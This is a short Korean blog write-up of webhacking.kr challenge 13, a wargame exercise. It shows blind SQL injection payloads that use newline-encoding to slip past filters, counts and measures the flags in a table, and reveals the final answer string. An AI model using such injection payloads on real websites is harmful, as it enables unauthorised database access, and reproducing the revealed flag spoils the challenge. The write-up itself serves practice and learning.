$ 웹 해킹 $/webhacking.kr

webhacking.kr 13번 [1000p]

ws1004 2019. 4. 9. 23:56

 

1 제출해 보겠습니다.

 

0 제출해 보겠습니다.

 

1 참이고, 0 거짓이기 때문에

 

참일때 result 1 나오고

거짓일때 result값이 안나옵니다.

 

다음 sql구문으로 flag 개수를 알수 있습니다.

if(select count(flag) from prob13password in 1,1,0)

 

?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in1,1,0)

다음과 같이 입력해 보면…

 

Flag 1개가 아닙니다..

 

if(select count(flag) from prob13password in 2,1,0)

 

?no=if((select%0acount(flag)%0afrom%0aprob13password%0a)in%0a(2),1,0)

넣어 봤습니다.

 

Flag 2 였네요

no=if((select(min(length(flag)))from(prob13password))in(4),1,2)

다음과 같은 sql문을 입력하면 password 길이를 찾을수 있는데

 

파이썬 코드로 한번 보내 보겠습니다.

↑ 위의 사진은 이어져 있는 사진입니다.

 

결과 :

 

Flag 2 이고

짧은 것은 4단어, 것은 20단어이다.

4단어는 : flag // 20단어는 : challenge13luckclear 이다.